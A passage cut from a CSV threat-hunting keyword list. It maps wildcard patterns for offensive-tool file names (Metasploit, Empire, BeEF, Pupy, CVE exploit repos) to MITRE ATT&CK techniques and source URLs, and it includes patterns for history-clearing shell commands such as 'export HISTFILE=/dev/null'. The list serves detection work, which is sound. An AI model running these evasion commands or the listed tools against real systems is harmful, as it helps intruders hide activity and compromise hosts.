TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"*Exfiltration.tests.ps1*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*existing_auto_target.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*exit_nimbo*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" +"*--expected Bad --expected-stop Welcome*","offensive_tool_keyword","bropper","An automatic Blind ROP exploitation tool ","T1068 - T1059.003 - T1140","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Hakumarachi/Bropper","1","0","N/A","7","2","175","18","2023-06-09T12:40:05Z","2023-01-20T14:09:19Z" +"*expl-bin*","offensive_tool_keyword","expl-bin","some of my modified exploits and some scripts.","T1210.001 - T1201 - T1059","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/sailay1996/expl-bin","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*explib2_ie11_exec_test_case.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*exploit*wordpress_add_admin*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*exploit.bash*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" +"*exploit.bat*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" +"*exploit.bin*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" +"*exploit.c*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" +"*exploit.com*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" +"*exploit.exe*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1543 - T1588 - T1211 - T1203","TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","1","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" +"*exploit.msi*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" +"*exploit.pl*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" +"*exploit.ps1*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1543 - T1588 - T1211 - T1203","TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","1","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" +"*exploit.py*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1543 - T1588 - T1211 - T1203","TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","1","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" +"*exploit.reg*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" +"*exploit.run*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" +"*exploit.sh*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" +"*exploit.vb*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" +"*exploit.vbe*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" +"*exploit.vbs*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1543 - T1588 - T1211 - T1203","TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","1","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" +"*exploit.vbscript*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" +"*exploit.zsh*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" +"*Exploit:Python/CVE*","signature_keyword","Antivirus Signature","Antiviurs signature_keyword","N/A","N/A","N/A","N/A","Malware","N/A","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*exploit_frameworks.py*","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","10","39278","4350","2023-09-13T19:08:33Z","2020-04-11T09:21:31Z" +"*exploit_fuse.c*","offensive_tool_keyword","POC","This repo contains demo exploits for CVE-2022-0185","T1210 - T1222 - T1506 - T1068","TA0002 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/Crusaders-of-Rust/CVE-2022-0185","1","0","N/A","N/A","4","364","55","2022-04-25T04:11:33Z","2022-01-19T06:19:38Z" +"*exploit_kctf.c*","offensive_tool_keyword","POC","This repo contains demo exploits for CVE-2022-0185","T1210 - T1222 - T1506 - T1068","TA0002 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/Crusaders-of-Rust/CVE-2022-0185","1","0","N/A","N/A","4","364","55","2022-04-25T04:11:33Z","2022-01-19T06:19:38Z" +"*exploit_oneline.md*","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/drgreenthumb93/CVE-2022-30190-follina","1","1","N/A","N/A","1","10","4","2023-04-20T20:34:05Z","2022-06-01T11:37:08Z" +"*exploit_suggester *","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*exploit_suggester.*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*exploit_suggester.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*Exploitation Toolkit*","offensive_tool_keyword","PRT","PRET is a new tool for printer security testing developed in the scope of a Masters Thesis at Ruhr University Bochum. It connects to a device via network or USB and exploits the features of a given printer language. Currently PostScript. PJL and PCL are supported which are spoken by most laser printers. This allows cool stuff like capturing or manipulating print jobs. accessing the printers file system and memory or even causing physical damage to the device. All attacks are documented in detail in the Hacking Printers Wiki. The main idea of PRET is to facilitate the communication between the end-user and the printer. Thus. after entering a UNIX-like command. PRET translates it to PostScript. PJL or PCL. sends it to the printer. evaluates the result and translates it back to a user-friendly format. PRET offers a whole bunch of commands useful for printer attacks and fuzzing","T1210.001 - T1027.002 - T1003 - T1505 - T1564.001","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Exploitation tools","https://github.com/RUB-NDS/PRT","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*exploit-database-bin-sploits/*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" +"*Exploit-JBoss -*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Exploit-JBoss.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Exploit-JBoss.ps1*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-JBoss.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Exploit-JBoss.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1062","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Exploit-Jenkins*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-Jenkins.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Exploit-Jenkins.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1063","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Exploit-JMXConsole*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-JBoss.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*exploits*_csrf/*.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*exploits*_csrf/*.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*exploits/*_macro*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*exploits/CVE-*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*exploit-suggester*","offensive_tool_keyword","Windows-Exploit-Suggester","This tool compares a targets patch levels against the Microsoft vulnerability database in order to detect potential missing patches on the target. It also notifies the user if there are public exploits and Metasploit modules available for the missing bulletins","T1199 - T1082 - T1210","TA0006 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/AonCyberLabs/Windows-Exploit-Suggester","1","1","N/A","N/A","10","3712","1016","2023-05-11T12:44:55Z","2014-07-08T13:16:28Z" +"*ExploitTest.cpp*","offensive_tool_keyword","POC","CVE-2022-21882 win32k LPE bypass CVE-2021-1732","T1068","TA0004","N/A","N/A","Exploitation tools","https://github.com/KaLendsi/CVE-2022-21882","1","0","N/A","N/A","5","454","142","2022-01-27T04:18:18Z","2022-01-27T03:44:10Z" +"*ExploitTest.vcxproj*","offensive_tool_keyword","POC","CVE-2022-21882 win32k LPE bypass CVE-2021-1732","T1068","TA0004","N/A","N/A","Exploitation tools","https://github.com/KaLendsi/CVE-2022-21882","1","0","N/A","N/A","5","454","142","2022-01-27T04:18:18Z","2022-01-27T03:44:10Z" +"*export HISTFILE=/dev/null*","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z" +"*export HISTFILESIZE=0*","greyware_tool_keyword","bash","Clear command history in linux which is used for defense evasion. ","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1146/T1146.yaml","1","0","greyware tool - risks of False positive !","N/A","10","8147","2532","2023-10-03T21:23:41Z","2017-10-11T17:23:32Z" +"*export HISTFILESIZE=0*","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z" +"*export HISTFILESIZE=0*","greyware_tool_keyword","export","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*export HISTSIZE=0*","greyware_tool_keyword","export","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*export KRB5CCNAME=*.ccache*","offensive_tool_keyword","PKINITtools","Tools for Kerberos PKINIT and relaying to AD CS","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation 